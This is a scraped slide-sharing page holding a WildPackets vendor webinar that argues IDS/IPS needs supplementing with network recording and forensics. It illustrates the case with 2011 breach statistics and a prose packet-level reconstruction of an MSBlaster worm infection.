CISSPCertified Information SystemsSecurity ProfessionalCop.docxCISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
sleeperharwell
 
CompTIA Security Study [Report]
CompTIA Security Study [Report]CompTIA Security Study [Report]
CompTIA Security Study [Report]
Assespro Nacional
 
Protecting endpoints from targeted attacks
Protecting endpoints from targeted attacksProtecting endpoints from targeted attacks
Protecting endpoints from targeted attacks
AppSense
 
Select and Implement a Next Generation Endpoint Protection Solution
Select and Implement a Next Generation Endpoint Protection SolutionSelect and Implement a Next Generation Endpoint Protection Solution
Select and Implement a Next Generation Endpoint Protection Solution
Info-Tech Research Group
 
Why Have A Digital Investigative Infrastructure
Why Have A Digital Investigative InfrastructureWhy Have A Digital Investigative Infrastructure
Why Have A Digital Investigative Infrastructure
Kevin Wharram
 
Pci compliance training agents
Pci compliance training agentsPci compliance training agents
Pci compliance training agents
ocinc
 

Similar to Cyber Security - IDS/IPS is not enough (20)

Identity intelligence: Threat-aware Identity and Access Management
Identity intelligence: Threat-aware Identity and Access ManagementIdentity intelligence: Threat-aware Identity and Access Management
Identity intelligence: Threat-aware Identity and Access Management
 
ISE 510 Final Project Scenario Background Limetree In.docx
ISE 510 Final Project Scenario Background Limetree In.docxISE 510 Final Project Scenario Background Limetree In.docx
ISE 510 Final Project Scenario Background Limetree In.docx
 
Cognitive Computing in Security with AI
Cognitive Computing in Security with AI Cognitive Computing in Security with AI
Cognitive Computing in Security with AI
 
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docxCISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
 
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docxCISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
 
DataPreserve- SEVRAR Jan 09
DataPreserve- SEVRAR Jan 09DataPreserve- SEVRAR Jan 09
DataPreserve- SEVRAR Jan 09
 
Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...
Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...
Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...
 
Whitepaper: IP Risk Assessment & Loss Prevention - Happiest Minds
Whitepaper: IP Risk Assessment & Loss Prevention - Happiest MindsWhitepaper: IP Risk Assessment & Loss Prevention - Happiest Minds
Whitepaper: IP Risk Assessment & Loss Prevention - Happiest Minds
 
Part 1: Identifying Insider Threats with Fidelis EDR Technology
Part 1: Identifying Insider Threats with Fidelis EDR Technology Part 1: Identifying Insider Threats with Fidelis EDR Technology
Part 1: Identifying Insider Threats with Fidelis EDR Technology
 
CompTIA Security Study [Report]
CompTIA Security Study [Report]CompTIA Security Study [Report]
CompTIA Security Study [Report]
 
Protecting endpoints from targeted attacks
Protecting endpoints from targeted attacksProtecting endpoints from targeted attacks
Protecting endpoints from targeted attacks
 
CS Sakerhetsdagen 2015 IBM Feb 19
CS Sakerhetsdagen 2015 IBM Feb 19CS Sakerhetsdagen 2015 IBM Feb 19
CS Sakerhetsdagen 2015 IBM Feb 19
 
Select and Implement a Next Generation Endpoint Protection Solution
Select and Implement a Next Generation Endpoint Protection SolutionSelect and Implement a Next Generation Endpoint Protection Solution
Select and Implement a Next Generation Endpoint Protection Solution
 
Why Have A Digital Investigative Infrastructure
Why Have A Digital Investigative InfrastructureWhy Have A Digital Investigative Infrastructure
Why Have A Digital Investigative Infrastructure
 
Risks vs real life
Risks vs real lifeRisks vs real life
Risks vs real life
 
Top_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptx
Top_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptxTop_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptx
Top_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptx
 
Organizational Security: When People are Involved
Organizational Security: When People are InvolvedOrganizational Security: When People are Involved
Organizational Security: When People are Involved
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 
IT Executive Guide to Security Intelligence
IT Executive Guide to Security IntelligenceIT Executive Guide to Security Intelligence
IT Executive Guide to Security Intelligence
 
Pci compliance training agents
Pci compliance training agentsPci compliance training agents
Pci compliance training agents
 

More from Savvius, Inc

Network Forensics Backwards and Forwards
Network Forensics Backwards and ForwardsNetwork Forensics Backwards and Forwards
Network Forensics Backwards and Forwards
Savvius, Inc
 
Bright talk voip vofi webinar jan2015-v2
Bright talk voip vofi webinar jan2015-v2Bright talk voip vofi webinar jan2015-v2
Bright talk voip vofi webinar jan2015-v2
Savvius, Inc
 
You Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
You Suspect a Security Breach. Network Forensic Analysis Gives You the AnswersYou Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
You Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
Savvius, Inc
 
Are you ready for 802.11ac?
Are you ready for 802.11ac?Are you ready for 802.11ac?
Are you ready for 802.11ac?
Savvius, Inc
 
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
Savvius, Inc
 
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
Savvius, Inc
 
Managing a Widely Distributed Network
Managing a Widely Distributed Network Managing a Widely Distributed Network
Managing a Widely Distributed Network
Savvius, Inc
 
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
Savvius, Inc
 
WildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper PreviewWildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper Preview
Savvius, Inc
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network Attacks
Savvius, Inc
 
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
Savvius, Inc
 
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
Savvius, Inc
 

More from Savvius, Inc (20)

Introducing Savvius Vigil
Introducing Savvius VigilIntroducing Savvius Vigil
Introducing Savvius Vigil
 
Long Term Reporting with Savvius and Splunk
Long Term Reporting with Savvius and SplunkLong Term Reporting with Savvius and Splunk
Long Term Reporting with Savvius and Splunk
 
Network Forensics Backwards and Forwards
Network Forensics Backwards and ForwardsNetwork Forensics Backwards and Forwards
Network Forensics Backwards and Forwards
 
Network Analysis Tips & Tricks with Omnipeek
Network Analysis Tips & Tricks with OmnipeekNetwork Analysis Tips & Tricks with Omnipeek
Network Analysis Tips & Tricks with Omnipeek
 
Why Every Engineer Needs WLAN Packet Analysis
Why Every Engineer Needs WLAN Packet AnalysisWhy Every Engineer Needs WLAN Packet Analysis
Why Every Engineer Needs WLAN Packet Analysis
 
Bright talk voip vofi webinar jan2015-v2
Bright talk voip vofi webinar jan2015-v2Bright talk voip vofi webinar jan2015-v2
Bright talk voip vofi webinar jan2015-v2
 
You Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
You Suspect a Security Breach. Network Forensic Analysis Gives You the AnswersYou Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
You Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
 
Are you ready for 802.11ac?
Are you ready for 802.11ac?Are you ready for 802.11ac?
Are you ready for 802.11ac?
 
Are You Missing Something?
Are You Missing Something?Are You Missing Something?
Are You Missing Something?
 
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
 
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
 
Managing a Widely Distributed Network
Managing a Widely Distributed Network Managing a Widely Distributed Network
Managing a Widely Distributed Network
 
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
 
WildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper PreviewWildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper Preview
 
Gigabit WLANs Need Gigabit WLAN Analysis
Gigabit WLANs Need Gigabit WLAN AnalysisGigabit WLANs Need Gigabit WLAN Analysis
Gigabit WLANs Need Gigabit WLAN Analysis
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network Attacks
 
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
 
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
 
The Changing Landscape in Network Performance Monitoring
The Changing Landscape in Network Performance Monitoring The Changing Landscape in Network Performance Monitoring
The Changing Landscape in Network Performance Monitoring
 
Wired and Wireless Network Forensics
Wired and Wireless Network ForensicsWired and Wireless Network Forensics
Wired and Wireless Network Forensics
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 

Recently uploaded (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 

Cyber Security - IDS/IPS is not enough

  • 1. Cyber Security IDS/IPS Is Not Enough! Jay Botelho Show us your tweets! Use today’s webinar hashtag: Director of Product Management WildPackets #wp_cybersecurity jbotelho@wildpackets.com with any questions, comments, or feedback. Follow me @jaybotelho Follow us @wildpackets © WildPackets, Inc. www.wildpackets.com
  • 2. Agenda • Current Trends in Cyber Security and Attacks • Cyber Attacks – Similarities and Differences • IDS/IPS Is Not Enough • Network Recording – Cyber Attack Insurance Policy • Cyber Attack CSI – Network Forensics • Company Overview • Product Line Overview Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 2
  • 3. Current Trends in Cyber Security and Attacks © WildPackets, Inc. www.wildpackets.com
  • 4. Key 2011 Cyber Attacks • Sony Playstation Network (April 2011) ‒ Account information, passwords and credit card numbers breached for 70M users ‒ Direct cost of $170M (Sony) ‒ Indirect cost estimated at 10 to 100x • The IMF (International Monetary Fund) (June 2011) ‒ Hack resulted in the loss of a “large quantity” of data, documents and email • Citigroup (June 2011) ‒ More than 200,000 customer accounts hacked ‒ Poor web application design made it easy • Android Apps ‒ More than 50% of the third-party apps on Google's official Android Market contained a Trojan called DroidDream, designed to steal personal data Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 4
  • 5. ―2011 - The Year of the Hack‖ • So named by IT security experts • 60% of IT executives fear Advanced Persistent Threat (APT) attacks • 28% fear theft and disclosure from insiders • 60% use either a written ―honor system‖ security policy or have none at all • 51% allow employees to download/install software • Companies continue to allow employees to engage in risky behaviors Based on Bit9’s Third Annual Endpoint Survey of 765 IT executives http://www.businesswire.com/news/home/20110830006206/en/%E2%80%9CYear- Hack%E2%80%9D-Survey-Reveals-Enterprises-Concerned-%E2%80%9CAdvanced Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 5
  • 6. Advanced Persistent Threat The New Buzzword for 2011/2012 • A long-term pattern of sophisticated hacking attacks aimed at governments, companies, and political activists • Advanced – Full spectrum of techniques ‒ Not all “advanced” (e.g. malware) ‒ Can develop more advanced tools as required ‒ Combines multiple targeting methods ‒ Focus on operational security not found in less advanced threats • Persistent – Priority to a specific task ‒ Not opportunistically seeking information for financial gain ‒ A “low-and-slow” approach is typical ‒ Maintain long-term access to the target • Threat – Capability and intent ‒ Executed by coordinated human actions vs. automation ‒ Specific objective with skilled, motivated, organized and well funded entities Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 6
  • 7. Multiple Successful Attacks Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 7
  • 8. Confidence Level for Next 12 Months Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 8
  • 9. Cost For The Past 12 Months Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 9
  • 10. Source of Breaches Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 10
  • 11. Cause of Breach Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 11
  • 12. Severity and Frequency Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 12
  • 13. Types of Attacks Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 13
  • 14. Current Security Measures Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 14
  • 15. Cyber Attacks Similarities and Differences © WildPackets, Inc. www.wildpackets.com
  • 16. Example #1: Heartland Payment Systems • SQL injection – entering a set of SQL commands into a text entry field on the website • Access then gained to key servers • Malware then planted to collect credit and debit card numbers • 130M accounts breached • Calls into question PCI compliance and monitoring • Potential upside – end to end security for financial transactions now being more seriously investigated Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 16
  • 17. Example #2: Twitter Breach • Compromise personal Gmail account of employee • Reset Gmail password so user is unaware • Leverage personal email account to gain access to corporate email account (hosted by Google) • Read email, attachments, etc., finding things like: ‒ Sensitive documents ‒ Other user names and passwords (or at least clues) • Fan out into other services based on acquired info: ‒ Cell phone records ‒ MobileMe ‒ Amazon/iTunes Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 17
  • 18. Example #3: MSBlaster Worm • Exploits Microsoft Windows RPC Vulnerability ‒ Microsoft RPC vulnerability using TCP Port 135 • Infected machines will attempt to propagate the worm to additional machines ‒ Infected machines will also attempt to launch a Distributed Denial of Service (DDoS) attack against Microsoft on the following schedule: • Any day in the months ‒ September - December • 16th to the 31st day of the following months: ‒ January - August Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 18
  • 19. IDS/IPS Is Not Enough © WildPackets, Inc. www.wildpackets.com
  • 20. What is IDS and IPS? • IDS – Intrusion Detection System ‒ Typically passive ‒ Detects and alarms on suspected intrusions using signature- based, statistical anomaly based, and/or stateful protocol analysis detection ‒ Has a reputation for false positives • IPS – Intrusion Prevention System ‒ Either works alongside and IDS, or has embedded IDS capabilities of its own ‒ Installed in-line ‒ Actively prevents intrusions by dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 20
  • 21. Limitations of IDS/IPS • No security product is 100% • Risk mitigation – what’s your risk tolerance? • On average 120K malware incidents identified per day by IDS/IPS • 5 - 20 new malware strains missed every day • Effectiveness vs. ease-of-use • Effectiveness vs. cost • Highly secure vs. high throughput Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 21
  • 22. And What If … • Data breaches are occurring from within the organization? • A breached mobile device or infected personal laptop brings outside threats inside the network which goes undetected by most IDS/IPS? • Any rogue or unauthorized devices tryies to access the network internally from behind the firewall? Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 22
  • 23. IDS/IPS – Key Questions • Will you sacrifice security for cost? • Where does the IDS/IPS provider get their rule set? • How much configuration is required? • How often is the rule set updated? • How well do they cover malware? • How well do they cover mainstream vulnerabilities? • How fast do they supply patches to update critical bugs? Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 23
  • 24. IDS/IPS Is Not Enough IDS / IPS System 2. Partial attack data processed 1. Attack bypasses firewall 3. Network engineer gets incomplete data from switch Result: Incomplete reconstruction deters diagnosis! Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 24
  • 25. Changing Methods – Network Recorders 2. Data Recorder records IDS/IPS System and aggregates data throughout attack 3. Event logged, attack partially tracked by IDS Servers 1. Attack bypasses firewall 4. Post event analysis reveals attacker, method, damage! Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 25
  • 26. Network Recording Cyber Attack Insurance Policy © WildPackets, Inc. www.wildpackets.com
  • 27. Network Recording • Requires the lossless capture and storage of extremely large data volumes • Focus on Enterprise vs. Lawful Intercept ‒ Concerned with the process of reconstructing a network event • Intrusion such as a “hack” or other penetration • Network or infrastructure outage ‒ Provides a recording of the actual incident • Based on live IP packet data captures ‒ A new way of looking at trace file analysis ‒ Continues from where traditional network troubleshooting ends Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 27
  • 28. Connectivity for Network Recording Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 28
  • 29. Network Data Storage at 10G • 1Gbps steady-state traffic assuming no storage overhead: 7.68 GB/min 460 GB/hr 11 TB/day 2.9 days in a 32TB appliance • 10Gbps: 76.8GB/min 4.6 TB/hr 110 TB/day 7.0 hours in a 32TB appliance Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 29
  • 30. Cyber Attack CSI Network Forensics © WildPackets, Inc. www.wildpackets.com
  • 31. Key Questions 1. Who was the intruder? 2. How did the intruder penetrate security? 3. What damage has been done? 4. Did the intruder leave anything behind? 5. Did we capture sufficient information to effectively analyze and reproduce the attack? Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 31
  • 32. MSBlaster Worm Example Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 32
  • 33. Server Connects to The Target Workstation TCP 3-Way-Handshake on Port 4444 (NV Video default) Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 33
  • 34. MSBlaster Worm Download Server infects the workstation with MSBlaster-Worm via TFTP Download Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 34
  • 35. MSBlaster Worm – Visual Reconstruction Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 35
  • 36. MSBlaster Worm Execute Command Activation command for the Blaster Worm payload 141.157.228.12 Sends the execute command to 10.1.1.31 Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 36
  • 37. Infected Workstation Now Attacks Others 10.1.1.31 Now scans for other nodes on the 180.191.253.XXX range Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 37
  • 38. Example #1: MSBlaster Worm Target Ports Execute Command Filter identifies devices infected with the MSBlaster worm Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 38
  • 39. What Can You Do? • Processes, processes, processes • Implement a network recording/network forensics solution • Establish clear baselines so changes are easy to detect • Employ solutions that continuously monitor packet- level security heuristics • Actively search for minor policy violations that could be indicators of bigger problems Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 39
  • 40. Company Overview © WildPackets, Inc. www.wildpackets.com
  • 41. Corporate Background • Experts in network monitoring, analysis, and troubleshooting ‒ Founded: 1990 / Headquarters: Walnut Creek, CA ‒ Offices throughout the US, EMEA, and APAC • Our customers are leading edge organizations ‒ Mid-market, and enterprise lines of business ‒ Financial, manufacturing, ISPs, major federal agencies, state and local governments, and universities ‒ Over 7,000 customers / 60+ countries / 80% of Fortune 1,000 • Award-winning solutions that improve network performance ‒ Internet Telephony, Network Magazine, Network Computing Awards ‒ United States Patent 5,787,253 issued July 28, 1998 • Different approach to maintaining availability of network services Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 41
  • 42. Real-World Deployments Education Financial Government Health Care / Retail Telecom Technology Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 42
  • 43. Product Line Overview © WildPackets, Inc. www.wildpackets.com
  • 44. Product Line Overview OmniPeek/Compass Enterprise Packet Capture, Decode and Analysis • 10/100/1000 Ethernet, Wireless, WAN, 10G • Portable capture and OmniEngine console • VoIP analysis and call playback Omnipliance / TimeLine Distributed Enterprise Network Forensics • Packet capture and real-time analysis • Stream-to-disk for forensics analysis • Integrated OmniAdapter network analysis cards WatchPoint Centralized Enterprise Network Monitoring Appliance • Aggregation and graphical display of network data • WildPackets OmniEngines • NetFlow and sFlow Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 45
